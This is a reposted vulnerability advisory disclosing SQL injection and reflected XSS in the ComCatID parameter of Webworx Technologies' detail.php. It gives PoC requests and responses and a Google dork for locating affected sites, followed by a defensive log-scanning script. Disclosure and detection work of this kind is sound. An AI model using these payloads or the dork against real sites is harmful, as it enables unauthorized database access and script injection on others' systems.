WEBWORX TECHNOLOGIES- Multiple Vulnerabilities - Multiple Vulnerabilities
The detail.php file of WEBWORX TECHNOLOGIES has SQL injection and reflected XSS vulnerabilities affecting the comCatID parameter. 2025-4-1 19:57:0 Author: cxsecurity.com


# Exploit Title: WEBWORX TECHNOLOGIES- Multiple Vulnerabilities - Multiple Vulnerabilities
# Date: March 25, 2025
# Exploit Author: wa0_3
# Telegram: @wa0_3
# Vendor Homepage: https://webworx.technology/
# Version: 1.0
# Tested on: Windows, local xampp
# DBMS: MySQL
# CVE: N/A
# Google Dork: intxt: Developed by Webworx Technologies inurl:detail.php?ComCatID= inurl:detail.php?ComCatID=

Vulnerability: SQLi
Type: error-based (MySQL)
File: detail.php
parameter:comCatID

## Proof of Concept (PoC):

GET /detail.php?ComCatID=26' HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.120 Safari/537.36
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="128", "Chromium";v="128"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0

Response:

HTTP/1.1 200 OK
Date: Thu, 27 Mar 2025 11:09:32 GMT
Server: Apache
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 173

You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '\' ORDER BY CompanyID ASC' at line 1

=============================================================================

Vulnerability: Reflected XSS
File: detail.php
parameter:comCatID

## Proof of Concept (PoC):

GET /detail.php?ComCatID=2526%00kph88<script>alert(1)<%2fscript>itghj HTTP/1.1
Host:localhost
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.120 Safari/537.36
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="128", "Chromium";v="128"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0

Response: alert popup message with (1)
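
A defender-side check for the two requests above, as an added example that is not part of the original advisory: it scans web-server access logs for detail.php requests whose decoded ComCatID value is not a plain integer. The log lines are constructed, and the Apache combined log format, the case-insensitive parameter match and the rule that legitimate IDs are integers of at most 10 digits are assumptions of this example.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed Apache combined-log lines (documentation IPs); the request
# targets mirror the two requests in the advisory plus benign traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [27/Mar/2025:11:09:30 +0000] "GET /detail.php?ComCatID=26 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [27/Mar/2025:11:09:32 +0000] "GET /detail.php?ComCatID=26' HTTP/1.1" 200 173 "-" "Mozilla/5.0"
203.0.113.9 - - [27/Mar/2025:11:10:01 +0000] "GET /detail.php?ComCatID=2526%00kph88<script>alert(1)<%2fscript>itghj HTTP/1.1" 200 4011 "-" "Mozilla/5.0"
203.0.113.7 - - [27/Mar/2025:11:10:05 +0000] "GET /index.php?page=2 HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify(value):
    """Reasons a decoded ComCatID is suspicious; [] for a 1-10 digit integer (assumed legitimate form)."""
    if re.fullmatch(r"[0-9]{1,10}", value):
        return []
    reasons = ["not-an-integer"]
    if "'" in value or '"' in value:
        reasons.append("quote")
    if "\x00" in value:
        reasons.append("nul-byte")
    if "<" in value or ">" in value:
        reasons.append("markup")
    return reasons

def scan(log_text):
    """Return (client_ip, decoded_value, reasons) for each suspicious detail.php request."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        ip, target = m.groups()
        parts = urlsplit(target)
        if not parts.path.lower().endswith("/detail.php"):
            continue
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if name.lower() == "comcatid":
                reasons = classify(value)
                if reasons:
                    findings.append((ip, value, reasons))
    return findings

if __name__ == "__main__":
    for ip, value, reasons in scan(SAMPLE_LOG):
        print(ip, repr(value), ",".join(reasons))
```

The same integer-only rule is the input validation detail.php itself would need before the value reaches the SQL query or the HTML response.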



 



Source: https://cxsecurity.com/issue/WLB-2025040002